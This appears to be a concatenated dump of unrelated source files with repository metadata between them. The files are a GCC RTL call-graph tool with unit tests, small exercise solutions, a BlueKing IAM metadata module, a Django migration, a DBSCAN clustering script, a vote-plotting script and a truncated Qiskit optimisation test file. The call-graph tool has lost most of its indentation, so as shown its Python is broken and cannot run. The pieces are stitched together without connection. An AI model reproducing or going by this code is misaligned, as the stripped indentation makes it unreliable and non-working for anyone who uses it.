# Eelco Chaudron
#
# Initial Created:
# 29 March 2018
#
# Notes:
#
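#   The RTL input is typically produced by compiling with GCC's RTL dump
#   enabled, e.g. (illustrative command, adapt to your build system):
#     gcc -fdump-rtl-expand -c foo.c
#   which writes a "foo.c.<NNN>r.expand" file; those .expand files are the
#   RTLFILE arguments this script expects.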
#
# Imports
#
import argparse
import fileinput
import os
import re
import sys
import time
#
# Unit tests for the dump_path() function.
# Invoke as: cally.py --unit-test dummy
#
# - Add --unit-test option
#
#
# Main -> A --> B --> C --> D
# A |_ [E]
# |_ F
# |_ G --> B
# \_ H --> I --> J --> D
#
#
#
#
unit_test_full_dump_output = [
'strict digraph callgraph {',
'"A" -> "A";', '"A" -> "B";',
'"B" -> "C";', '"B" -> "E";',
'"E" [style=dashed]', '"B" -> "F";',
'"B" -> "G";', '"B" -> "H";',
'"C" -> "D";', '"D"', '"F"',
'"G" -> "B";', '"H" -> "I";',
'"I" -> "J";', '"J" -> "D";',
'"main" -> "A";',
'}'
]
unit_test_full_caller_output = [
'"A" -> "A";',
'"A" -> "B" -> "H" -> "I" -> "J" -> "D";',
'"A" -> "B" -> "C" -> "D";',
'"A" -> "B" -> "E";\n"E" [style=dashed];',
'"A" -> "B" -> "G" -> "B";',
'"A" -> "B" -> "F";'
]
unit_test_noexterns_caller_output = [
'"A" -> "A";',
'"A" -> "B" -> "H" -> "I" -> "J" -> "D";',
'"A" -> "B" -> "C" -> "D";',
'"B" [color=red];',
'"A" -> "B" -> "G" -> "B";',
'"A" -> "B" -> "F";'
]
unit_test_maxdepth2_caller_output = [
'"A" -> "A";',
'"A" -> "B";\n"B" [color=red];',
'"A" -> "B";\n"B" [color=red];',
'"B" [color=red];',
'"A" -> "B";\n"B" [color=red];',
'"A" -> "B";\n"B" [color=red];'
]
unit_test_maxdepth3_caller_output = [
'"A" -> "A";',
'"A" -> "B" -> "H";\n"H" [color=red];',
'"A" -> "B" -> "C";\n"C" [color=red];',
'"A" -> "B" -> "E";\n"E" [style=dashed];',
'"A" -> "B" -> "G";\n"G" [color=red];',
'"A" -> "B" -> "F";'
]
unit_test_regex_caller_output = [
'"A" -> "A";', '"A" -> "B" -> "H" -> "I" -> "J" -> "D";',
'"A" -> "B";\n"B" [color=red];',
'"B" [color=red];',
'"A" -> "B";\n"B" [color=red];',
'"A" -> "B" -> "F";']
unit_test_full_callee_output = [
'"A" -> "A" -> "B";', '"main" -> "A" -> "B";', '"B" -> "G" -> "B";'
]
unit_test_maxdepth4_callee_output = [
'"A" -> "A" -> "B" -> "C" -> "D";',
'"A" -> "B" -> "C" -> "D";\n"A" [color=red];',
'"G" -> "B" -> "C" -> "D";\n"G" [color=red];',
'"H" -> "I" -> "J" -> "D";\n"H" [color=red];'
]
unit_test_maxdepth5_callee_output = [
'"A" -> "A" -> "B" -> "C" -> "D";', '"main" -> "A" -> "B" -> "C" -> "D";',
'"B" -> "G" -> "B" -> "C" -> "D";', '"B" -> "H" -> "I" -> "J" -> "D";'
]
#
# Actual unit test
#
def unit_test():
#
# Built test functions dictionary
#
functions = dict()
unit_test_add_call(functions, "main", ["A"])
unit_test_add_call(functions, "A", ["A", "B"])
unit_test_add_call(functions, "B", ["C", "E", "F", "G", "H"])
unit_test_add_call(functions, "C", ["D"])
unit_test_add_call(functions, "D", [])
# "E" does not exists, it's an external function
unit_test_add_call(functions, "F", [])
unit_test_add_call(functions, "G", ["B"])
unit_test_add_call(functions, "H", ["I"])
unit_test_add_call(functions, "I", ["J"])
unit_test_add_call(functions, "J", ["D"])
build_callee_info(functions)
#
# Execute unit tests
#
print_dbg("UNIT TEST START")
print_dbg("---------------")
total = 0
failures = 0
#
# Full graph dump
#
print_dbg("")
print_dbg("FULL GRAPH")
print_dbg("============")
total += 1
buffer = list()
full_call_graph(functions, stdio_buffer=buffer)
failures += unit_test_check_error("FULL GRAPH",
unit_test_full_dump_output, buffer)
#
# Full caller dump
#
print_dbg("")
print_dbg("FULL CALLER")
print_dbg("===========")
total += 1
buffer = list()
dump_path([], functions, "A",
max_depth=0,
exclude=None,
no_externs=False,
stdio_buffer=buffer)
failures += unit_test_check_error("FULL CALLER",
unit_test_full_caller_output, buffer)
#
# Full caller dump with no externs
#
print_dbg("")
print_dbg("CALLER NO EXTERNS")
print_dbg("=================")
total += 1
buffer = list()
dump_path([], functions, "A",
max_depth=0,
exclude=None,
no_externs=True,
stdio_buffer=buffer)
failures += unit_test_check_error("CALLER, NO_EXTERNS",
unit_test_noexterns_caller_output,
buffer)
#
# Caller with limit depth
#
print_dbg("")
print_dbg("CALLER LIMITED DEPTH (2)")
print_dbg("========================")
total += 1
buffer = list()
dump_path([], functions, "A",
max_depth=2,
exclude=None,
no_externs=False,
stdio_buffer=buffer)
failures += unit_test_check_error("CALLER, MAX DEPTH 2",
unit_test_maxdepth2_caller_output,
buffer)
print_dbg("")
print_dbg("CALLER LIMITED DEPTH (3)")
print_dbg("========================")
total += 1
buffer = list()
dump_path([], functions, "A",
max_depth=3,
exclude=None,
no_externs=False,
stdio_buffer=buffer)
failures += unit_test_check_error("CALLER, MAX DEPTH 3",
unit_test_maxdepth3_caller_output,
buffer)
#
# Caller with limited by regex
#
print_dbg("")
print_dbg("CALLER REGEX MATCH")
print_dbg("==================")
total += 1
buffer = list()
dump_path([], functions, "A",
max_depth=0,
exclude="C|E|G",
no_externs=False,
stdio_buffer=buffer)
failures += unit_test_check_error("CALLER, REGEX",
unit_test_regex_caller_output,
buffer)
#
# Full callee
#
print_dbg("")
print_dbg("CALLEE FULL")
print_dbg("===========")
total += 1
buffer = list()
dump_path([], functions, "B",
max_depth=0,
reverse_path=True,
exclude=None,
call_index="callee_calls",
stdio_buffer=buffer)
failures += unit_test_check_error("CALLEE, FULL",
unit_test_full_callee_output,
buffer)
#
# Max depth callee
#
print_dbg("")
print_dbg("CALLEE MAX DEPTH 4")
print_dbg("==================")
total += 1
buffer = list()
dump_path([], functions, "D",
max_depth=4,
reverse_path=True,
exclude=None,
call_index="callee_calls",
stdio_buffer=buffer)
failures += unit_test_check_error("CALLEE, MAX DEPTH 4",
unit_test_maxdepth4_callee_output,
buffer)
print_dbg("")
print_dbg("CALLEE MAX DEPTH 5")
print_dbg("==================")
total += 1
buffer = list()
dump_path([], functions, "D",
max_depth=5,
reverse_path=True,
exclude=None,
call_index="callee_calls",
stdio_buffer=buffer)
failures += unit_test_check_error("CALLEE, MAX DEPTH 5",
unit_test_maxdepth5_callee_output,
buffer)
#
# Show results
#
print_dbg("")
print_dbg("UNIT TEST END, RESULTS")
print_dbg("----------------------")
print_dbg("Total tests run: {}".format(total))
print_dbg("Total errors : {}".format(failures))
if failures > 0:
    print_err("!!! ERRORS WERE FOUND !!!")
    return 1
return 0
#
# unit_test_check_error()
#
def unit_test_check_error(test, ref, results):
if len(results) == len(ref):
for i in range(0, len(results)):
if results[i] != ref[i]:
print_err("[FAIL] \"{}\" @line {}, \"{}\" vs \"{}\"".
format(test, i, results[i], ref[i]))
return 1
else:
print_err("[FAIL] {}".format(test))
return 1
return 0
#
# unit_test_add_call
#
def unit_test_add_call(functions, function_name, calls):
if function_name in functions:
print("ERROR: Function already defined!!")
functions[function_name] = dict()
functions[function_name]["files"] = ["unit_test.c"]
functions[function_name]["calls"] = dict()
for call in calls:
functions[function_name]["calls"][call] = True
functions[function_name]["refs"] = dict()
functions[function_name]["callee_calls"] = dict()
functions[function_name]["callee_refs"] = dict()
#
# Add callee to database
#
def build_callee_info(function_db):
for call, value in function_db.items():
for callee in value["calls"]:
if callee in function_db and \
call not in function_db[callee]["callee_calls"]:
function_db[callee]["callee_calls"][call] = 1
for callee in value["refs"]:
if callee in function_db and \
call not in function_db[callee]["callee_refs"]:
function_db[callee]["callee_refs"][call] = 1
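# Added note: build_callee_info() above simply inverts the "calls"/"refs" edges so
# that every function also records who calls or references it; dump_path() can then
# walk the graph in either direction by selecting "calls" or "callee_calls" through
# the call_index argument.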
#
# dump_path_ascii()
#
def dump_path_ascii(path, reverse, **kwargs):
externs = kwargs.get("externs", False)
truncated = kwargs.get("truncated", False)
std_buf = kwargs.get("stdio_buffer", None)
if len(path) == 0:
return
ascii_path = ""
for function in reversed(path) if reverse else path:
if ascii_path != "":
ascii_path += " -> "
ascii_path += '"' + function + '"'
if truncated or externs:
ascii_path += ';\n"{}"{}{}'. \
format(function if not reverse else path[-1],
" [style=dashed]" if externs else "",
" [color=red]" if truncated else "")
print_buf(std_buf, ascii_path + ";")
#
# Dump path as ASCII to stdout
#
def dump_path(path, functions, function_name, **kwargs):
max_depth = kwargs.get("max_depth", 0)
reverse_path = kwargs.get("reverse_path", False)
exclude = kwargs.get("exclude", None)
call_index = kwargs.get("call_index", "calls")
no_externs = kwargs.get("no_externs", False)
std_buf = kwargs.get("stdio_buffer", None)
#
# Pass on __seen_in_path as a way to determine if a node in the graph
# was already processed
#
if "__seen_in_path" in kwargs:
seen_in_path = kwargs["__seen_in_path"]
else:
seen_in_path = dict()
kwargs["__seen_in_path"] = seen_in_path
#
# If we have reached the max depth, or need to stop due to an exclusion match,
# display the path up to the previous entry.
#
if (exclude is not None and re.match(exclude, function_name) is not None) \
or (max_depth > 0 and len(path) >= max_depth):
dump_path_ascii(path, reverse_path, stdio_buffer=std_buf,
truncated=True)
return
#
# If already seen, we need to terminate the path here...
#
if function_name in seen_in_path:
if (max_depth <= 0 or (len(path) + 1) <= max_depth):
dump_path_ascii(path + [function_name], reverse_path,
stdio_buffer=std_buf)
return
seen_in_path[function_name] = True
#
# Now walk the path for each child
#
children = 0
for caller in functions[function_name][call_index]:
#
# The child is a known function, handle this through recursion
#
if caller in functions:
children += 1
if function_name != caller:
dump_path(path + [function_name],
functions, caller, **kwargs)
else:
#
# This is a recursive call to the function itself, add it once
#
dump_path_ascii(path + [function_name, caller], reverse_path,
stdio_buffer=std_buf)
#
# This is an external child, so we cannot handle it recursively.
# However, as it has no further children, we can handle it here
# (if it can be included).
#
elif (exclude is None or re.match(exclude, caller) is None) and \
(max_depth <= 0 or (len(path) + 2) <= max_depth) and \
not no_externs:
children += 1
dump_path_ascii(path + [function_name, caller], reverse_path,
externs=True, stdio_buffer=std_buf)
else:
print_buf(std_buf, '"{}" [color=red];'.
format(function_name))
#
# If there were no children, the path ends here, so dump it.
#
if children == 0:
dump_path_ascii(path + [function_name], reverse_path,
stdio_buffer=std_buf)
#
# print_err()
#
def print_err(text):
sys.stderr.write(text + "\n")
#
# print_dbg()
#
def print_dbg(text):
sys.stderr.write("DBG: " + text + "\n")
#
# print_buf()
#
def print_buf(buf, text):
if buf is not None:
buf.append(text)
print(text)
#
# Dump function details:
#
def dump_function_info(functions, function, details):
finfo = functions[function]
print(" {}() {}".format(function,
finfo["files"] if details else ""))
if details:
for caller in sorted(finfo["calls"].keys()):
print(" --> {}".format(caller))
if len(finfo["calls"]) > 0 and len(finfo["callee_calls"]) > 0:
print(" ===")
for caller in sorted(finfo["callee_calls"].keys()):
print(" <-- {}".format(caller))
print("\n")
#
# Build full call graph
#
def full_call_graph(functions, **kwargs):
exclude = kwargs.get("exclude", None)
no_externs = kwargs.get("no_externs", False)
std_buf = kwargs.get("stdio_buffer", None)
print_buf(std_buf, "strict digraph callgraph {")
#
# Simply walk all nodes and print the callers
#
for func in sorted(functions.keys()):
printed_functions = 0
if exclude is None or \
re.match(exclude, func) is None:
for caller in sorted(functions[func]["calls"].keys()):
if (not no_externs or caller in functions) and \
(exclude is None or
re.match(exclude, caller) is None):
print_buf(std_buf, '"{}" -> "{}";'.format(func, caller))
if caller not in functions:
print_buf(std_buf, '"{}" [style=dashed]'.
format(caller))
printed_functions += 1
if printed_functions == 0:
print_buf(std_buf, '"{}"'.format(func))
print_buf(std_buf, "}")
#
# Main()
#
def main():
#
# Data sets
#
functions = dict()
#
# Command line argument parsing
#
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--debug",
help="Enable debugging", action="store_true")
parser.add_argument("-f", "--functions", metavar="FUNCTION",
help="Dump functions name(s)",
type=str, default="&None", const="&all",
action='store', nargs='?')
parser.add_argument("--callee",
help="Callgraph for the function being called",
type=str, metavar="FUNCTION")
parser.add_argument("--caller",
help="Callgraph for functions being called by",
type=str, metavar="FUNCTION")
parser.add_argument("-e", "--exclude",
help="RegEx for functions to exclude",
type=str, metavar="REGEX")
parser.add_argument("--no-externs",
help="Do not show external functions",
action="store_true")
parser.add_argument("--no-warnings",
help="Do not show warnings on the console",
action="store_true")
parser.add_argument("--max-depth", metavar="DEPTH",
help="Maximum tree depth traversal, default no depth",
type=int, default=0)
parser.add_argument("--unit-test", help=argparse.SUPPRESS,
action="store_true")
parser.add_argument("RTLFILE", help="GCCs RTL .expand file", nargs="+")
config = parser.parse_args()
#
# If the unit test option is specified jump straight into it...
#
if config.unit_test:
return unit_test()
#
# Additional option checks
#
if config.caller and config.callee:
print_err("ERROR: Either --caller or --callee option should be given, "
"not both!".format(config.callee))
return 1
if config.exclude is not None:
try:
exclude_regex = re.compile(config.exclude)
except Exception as e:
print_err("ERROR: Invalid --exclude regular expression, "
"\"{}\" -> \"{}\"!".
format(config.exclude, e))
return 1
else:
exclude_regex = None
if not config.caller and not config.callee and config.max_depth:
print_err("ERROR: The --max_depth option is only valid with "
"--caller or --callee!")
return 1
#
# Check if all files exist
#
for file in config.RTLFILE:
if not os.path.isfile(file) or not os.access(file, os.R_OK):
print_err("ERROR: Can't open rtl file, \"{}\"!".format(file))
return 1
#
# Regex to extract functions
#
function = re.compile(
"^;; Function (?P<mangle>.*)\s+\((?P<function>\S+)(,.*)?\).*$")
call = re.compile(
"^.*\(call.*\"(?P<target>.*)\".*$")
symbol_ref = re.compile("^.*\(symbol_ref.*\"(?P<target>.*)\".*$")
#
# Parse each line in each file given
#
function_name = ""
start_time = time.time()
for line in fileinput.input(config.RTLFILE):
#
# Find function entry point
#
match = re.match(function, line)
if match is not None:
function_name = match.group("function")
if function_name in functions:
if not config.no_warnings:
print_err("WARNING: Function {} defined in multiple"
"files \"{}\"!".
format(function_name,
', '.join(map(
str,
functions[function_name]["files"] +
[fileinput.filename()]))))
else:
functions[function_name] = dict()
functions[function_name]["files"] = list()
functions[function_name]["calls"] = dict()
functions[function_name]["refs"] = dict()
functions[function_name]["callee_calls"] = dict()
functions[function_name]["callee_refs"] = dict()
functions[function_name]["files"].append(fileinput.filename())
#
#
# Find direct function calls
else:
match = re.match(call, line)
if match is not None:
target = match.group("target")
if target not in functions[function_name]["calls"]:
functions[function_name]["calls"][target] = True
else:
match = re.match(symbol_ref, line)
if match is not None:
target = match.group("target")
if target not in functions[function_name]["refs"]:
functions[function_name]["refs"][target] = True
if config.debug:
print_dbg("[PERF] Processing {} RTL files took {:.9f} seconds".format(
len(config.RTLFILE), time.time() - start_time))
print_dbg("[PERF] Found {} functions".format(len(functions)))
#
# Build callee data
#
start_time = time.time()
build_callee_info(functions)
if config.debug:
print_dbg("[PERF] Building callee info took {:.9f} seconds".format(
time.time() - start_time))
#
# Dump functions if requested
#
if config.functions != "&None":
print("\nFunction dump")
print("-------------")
if config.functions == "&all":
for func in sorted(functions.keys()):
dump_function_info(functions, func, config.debug)
else:
if config.functions in functions:
dump_function_info(functions, config.functions, config.debug)
else:
print_err("ERROR: Can't find callee, \"{}\" in RTL data!".
format(config.callee))
return 1
return 0
start_time = time.time()
#
# Dump full call graph
#
if not config.caller and not config.callee:
full_call_graph(functions, exclude=config.exclude,
no_externs=config.no_externs)
#
# Build callgraph for callee function
#
if config.callee is not None:
if config.callee in functions:
print("strict digraph callgraph {")
print('"{}" [color=blue, style=filled];'.format(config.callee))
dump_path([], functions, config.callee,
max_depth=config.max_depth,
reverse_path=True,
exclude=exclude_regex,
call_index="callee_calls")
print("}")
else:
print_err("ERROR: Can't find callee, \"{}\" in RTL data!".
format(config.callee))
return 1
#
# Build callgraph for caller function
#
elif config.caller is not None:
if config.caller in functions:
print("strict digraph callgraph {")
print('"{}" [color=blue, style=filled];'.format(config.caller))
dump_path([], functions, config.caller,
max_depth=config.max_depth,
exclude=exclude_regex,
no_externs=config.no_externs)
print("}")
else:
print_err("ERROR: Can't find caller \"{}\" in RTL data!".
format(config.caller))
return 1
if config.debug:
print_dbg("[PERF] Generating .dot file took {:.9f} seconds".format(
time.time() - start_time))
return 0
#
# Start main() as default entry point...
#
if __name__ == '__main__':
exit(main())
|
[
"echaudro@redhat.com"
] |
echaudro@redhat.com
|
45620672ed607a3171dae6cf19a63dea278a32ce
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/_algorithms_challenges/edabit/_Edabit-Solutions-master/Odd Up, Even Down/solution.py
|
280dd4e50c5e27743667091935a4280519266904
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 149
|
py
|
def transform(lst):
    output = []
    for i in lst:
        if i % 2 == 0:
            output.append(i - 1)
        else:
            output.append(i + 1)
    return output
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
96b72c3e8d75f73087aa5d785f9d688d43fba4a9
|
920b9cb23d3883dcc93b1682adfee83099fee826
|
/iam/meta.py
|
1c14641c524eaf4af143f55b16491ad41f993154
|
[
"MIT",
"LGPL-2.1-or-later",
"LGPL-3.0-only"
] |
permissive
|
TencentBlueKing/bk-itsm
|
f817fb166248d3059857b57d03e8b5ec1b78ff5b
|
2d708bd0d869d391456e0fb8d644af3b9f031acf
|
refs/heads/master
| 2023-08-31T23:42:32.275836
| 2023-08-22T08:17:54
| 2023-08-22T08:17:54
| 391,839,825
| 100
| 86
|
MIT
| 2023-09-14T08:24:54
| 2021-08-02T06:35:16
|
Python
|
UTF-8
|
Python
| false
| false
| 1,689
|
py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
_SYSTEM = "system"
_RESOURCES = "resources"
_ACTIONS = "actions"
__meta_info__ = {_SYSTEM: {}, _RESOURCES: {}, _ACTIONS: {}}
def setup_system(system_id, system_name):
__meta_info__[_SYSTEM].setdefault(system_id, {})["name"] = system_name
def get_system_name(system_id):
return __meta_info__[_SYSTEM].get(system_id, {}).get("name")
def setup_resource(system_id, resource_id, resource_name):
__meta_info__[_RESOURCES].setdefault(system_id, {}).setdefault(resource_id, {})["name"] = resource_name
def get_resource_name(system_id, resource_id):
return __meta_info__[_RESOURCES].get(system_id, {}).get(resource_id, {}).get("name")
def setup_action(system_id, action_id, action_name):
__meta_info__[_ACTIONS].setdefault(system_id, {}).setdefault(action_id, {})["name"] = action_name
def get_action_name(system_id, action_id):
return __meta_info__[_ACTIONS].get(system_id, {}).get(action_id, {}).get("name")
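# Illustrative usage (added; the identifiers below are made-up examples, not part of
# any real registry):
#   setup_system("bk_itsm", "ITSM")
#   setup_action("bk_itsm", "ticket_view", "View ticket")
#   get_system_name("bk_itsm")                  # -> "ITSM"
#   get_action_name("bk_itsm", "ticket_view")   # -> "View ticket"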
|
[
"1758504262@qq.com"
] |
1758504262@qq.com
|
230fd3f583cf4b11ae9b08638c18199189fa8127
|
e1e101c278d6bba461e3782325d834ca199d7ce4
|
/hosts/migrations/0004_auto_20201109_2011.py
|
2567de45c317ce450e1d24a08d75ba0e4d7723c4
|
[
"MIT"
] |
permissive
|
mateuslimax22/djangorest
|
6efeeff6a7282ca2d9ebda9c62eb3f165222d4ac
|
6d9a0cfa72c5e287218e53eaf708b7175bca475b
|
refs/heads/master
| 2023-01-11T01:08:02.234544
| 2020-11-10T23:24:15
| 2020-11-10T23:24:15
| 311,785,687
| 0
| 0
| null | 2020-11-10T23:24:17
| 2020-11-10T21:11:24
| null |
UTF-8
|
Python
| false
| false
| 508
|
py
|
# Generated by Django 3.1.3 on 2020-11-09 23:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('vulnerabilities', '0005_remove_vulnerability_affected_host'),
('hosts', '0003_host_host'),
]
operations = [
migrations.AlterField(
model_name='host',
name='host',
field=models.ManyToManyField(blank=True, related_name='book_list', to='vulnerabilities.Vulnerability'),
),
]
|
[
"mateuslimax8@gmail.com"
] |
mateuslimax8@gmail.com
|
b017ea97681e78e573ef2263673d410c3b1bbfb0
|
ed04425041ff7c18eb60d27dda5353ba3b65974b
|
/src/dbscan.py
|
e6518e7dd770950a047e138a2a618b82847123bb
|
[] |
no_license
|
alexmi256/colordiff
|
36e927b5acb72f61bc50a17cbfed4221e42c8e61
|
db91e0a10a0d8b1d1e3f734ca4c67635344f2b55
|
refs/heads/main
| 2023-03-15T09:32:23.209377
| 2021-03-08T02:19:47
| 2021-03-08T02:19:47
| 345,106,384
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 677
|
py
|
from sklearn.cluster import DBSCAN
from src.example import make_matrix, print_clusters
# Try out DBScan
colors, distance_matrix = make_matrix()
# Compute DBSCAN
# The results are pretty bad
db = DBSCAN(eps=17, metric="precomputed", min_samples=1).fit(distance_matrix)
labels = db.labels_
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
n_noise_ = list(labels).count(-1)
print("Estimated number of clusters: %d" % n_clusters_)
print("Estimated number of noise points: %d" % n_noise_)
if -1 in labels:
print("There were no clusters found")
else:
print_clusters(colors, labels, distance_matrix)
|
[
"alexmi3.14@gmail.com"
] |
alexmi3.14@gmail.com
|
18ec3d099574b4d49f99ed32f6cf549f4d0278bb
|
a9efc041fa75d447b26f7a57fc8673f48360acec
|
/pe015.py
|
52a33de20c1caad00896b0cdd18f40ee58e87e57
|
[] |
no_license
|
stepheniota/euler
|
9b497073c49f764a4e1140ef18851f6a0bfafdb0
|
6f71440ebdc34b1e077c9cf145e456648a35f474
|
refs/heads/main
| 2023-08-27T01:15:56.915553
| 2021-11-14T10:54:51
| 2021-11-14T10:54:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
""" pe 15 - power digit sum
What is the sum of the digits of the number 2^{1000}?
"""
ans = sum(int(n) for n in str(2**1000))
print(ans)
|
[
"iota@usc.edu"
] |
iota@usc.edu
|
b9fabd9eff824bc52f679ea4a021f6c1c82aac47
|
21363a3e7ca2cd9be81730fdd52b2c7cc0b06d4b
|
/codebase/Analysis.py
|
e6231222c936e1a75148c926d230da74ab72a1f8
|
[] |
no_license
|
AkshatParmar/InfoAndNetw
|
1ed9c86c09977fae9af16a4e5035acbf9aa12224
|
52723355638abd76e0f1a1057dd0644f6668081f
|
refs/heads/main
| 2023-01-24T11:17:32.871990
| 2020-12-08T21:34:30
| 2020-12-08T21:34:30
| 314,391,766
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,104
|
py
|
from matplotlib import pyplot as plt
from server import vote_tally as vt
def plot():
presidents, senators = vt()
##Senators
plt.figure()
ax = plt.subplot()
s_keys= list(senators.keys())
s_votes = list(senators.values())
cmap = plt.cm.get_cmap('hsv', 10)
sen_n = len(s_keys)
for i in range(sen_n):
plt.bar(s_keys[i], s_votes[i], color=cmap(i), edgecolor='black')
ax.get_yaxis().set_ticks([])
ax.set_xticklabels(s_votes)
plt.title('Vote Tally')
ax.legend(labels=s_keys, title='Candidates')
plt.savefig('senators.png')
###Presidents
plt.figure()
ax = plt.subplot()
p_keys = list(presidents.keys())
p_votes = list(presidents.values())
cmap = plt.cm.get_cmap('hsv', 10)
sen_n = len(p_keys)
for i in range(sen_n):
plt.bar(p_keys[i], p_votes[i], color=cmap(i), edgecolor='black')
ax.get_yaxis().set_ticks([])
ax.set_xticklabels(p_votes)
plt.title('Vote Tally')
ax.legend(labels=p_keys, title = 'Candidates')
plt.savefig('presidents.png')
if __name__ == "__main__":
plot()
|
[
"ranisayed16@gmail.com"
] |
ranisayed16@gmail.com
|
7a410cee59ce745aece00045c89256e91bdcc0c3
|
e53220dfff20c05516aa3e1b605758aae5344136
|
/test/python/transpiler/test_optimize_1q_decomposition.py
|
86e9d379aaa1de75d7ddd0add9c944eb07377461
|
[
"Apache-2.0"
] |
permissive
|
Arihant-Joshi/qiskit-terra
|
67bf0a2f03f5abdb324bdedcfb710c65d772c0d9
|
3a402a3b4726e16c26f7235dc15bfb7e29617efe
|
refs/heads/main
| 2023-06-27T02:10:07.191096
| 2021-08-03T09:01:37
| 2021-08-03T09:01:37
| 363,187,722
| 0
| 0
|
Apache-2.0
| 2021-07-29T14:57:09
| 2021-04-30T15:46:41
|
Python
|
UTF-8
|
Python
| false
| false
| 18,598
|
py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=no-member
"""Test the optimize-1q-gate pass"""
import unittest
import ddt
import numpy as np
from qiskit.circuit import QuantumRegister, QuantumCircuit, ClassicalRegister
from qiskit.circuit.library.standard_gates import UGate, SXGate, PhaseGate
from qiskit.circuit.library.standard_gates import U3Gate, U2Gate, U1Gate
from qiskit.circuit.random import random_circuit
from qiskit.transpiler import PassManager
from qiskit.transpiler.passes import Optimize1qGatesDecomposition
from qiskit.transpiler.passes import BasisTranslator
from qiskit.circuit.equivalence_library import SessionEquivalenceLibrary as sel
from qiskit.quantum_info import Operator
from qiskit.test import QiskitTestCase
from qiskit.circuit import Parameter
@ddt.ddt
class TestOptimize1qGatesDecomposition(QiskitTestCase):
"""Test for 1q gate optimizations."""
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["u1", "rx"],
["rz", "sx"],
["p", "sx"],
["r"],
)
def test_optimize_h_gates_pass_manager(self, basis):
"""Transpile: qr:--[H]-[H]-[H]--"""
qr = QuantumRegister(1, "qr")
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.h(qr[0])
expected = QuantumCircuit(qr)
expected.u(np.pi / 2, 0, np.pi, qr) # U2(0, pi)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertTrue(Operator(circuit).equiv(Operator(result)))
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["u1", "rx"],
["rz", "sx"],
["p", "sx"],
["r"],
)
def test_ignores_conditional_rotations(self, basis):
"""Conditional rotations should not be considered in the chain."""
qr = QuantumRegister(1, "qr")
cr = ClassicalRegister(2, "cr")
circuit = QuantumCircuit(qr, cr)
circuit.p(0.1, qr).c_if(cr, 1)
circuit.p(0.2, qr).c_if(cr, 3)
circuit.p(0.3, qr)
circuit.p(0.4, qr)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertTrue(Operator(circuit).equiv(Operator(result)))
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["u1", "rx"],
["rz", "sx"],
["p", "sx"],
["r"],
)
def test_in_the_back(self, basis):
"""Optimizations can be in the back of the circuit.
See https://github.com/Qiskit/qiskit-terra/issues/2004.
qr0:--[U1]-[U1]-[H]--
"""
qr = QuantumRegister(1, "qr")
circuit = QuantumCircuit(qr)
circuit.p(0.3, qr)
circuit.p(0.4, qr)
circuit.h(qr)
expected = QuantumCircuit(qr)
expected.p(0.7, qr)
expected.h(qr)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertTrue(Operator(circuit).equiv(Operator(result)))
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["rz", "sx"],
["u1", "rx"],
["p", "sx"],
)
def test_single_parameterized_circuit(self, basis):
"""Parameters should be treated as opaque gates."""
qr = QuantumRegister(1)
qc = QuantumCircuit(qr)
theta = Parameter("theta")
qc.p(0.3, qr)
qc.p(0.4, qr)
qc.p(theta, qr)
qc.p(0.1, qr)
qc.p(0.2, qr)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
self.assertTrue(
Operator(qc.bind_parameters({theta: 3.14})).equiv(
Operator(result.bind_parameters({theta: 3.14}))
)
)
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
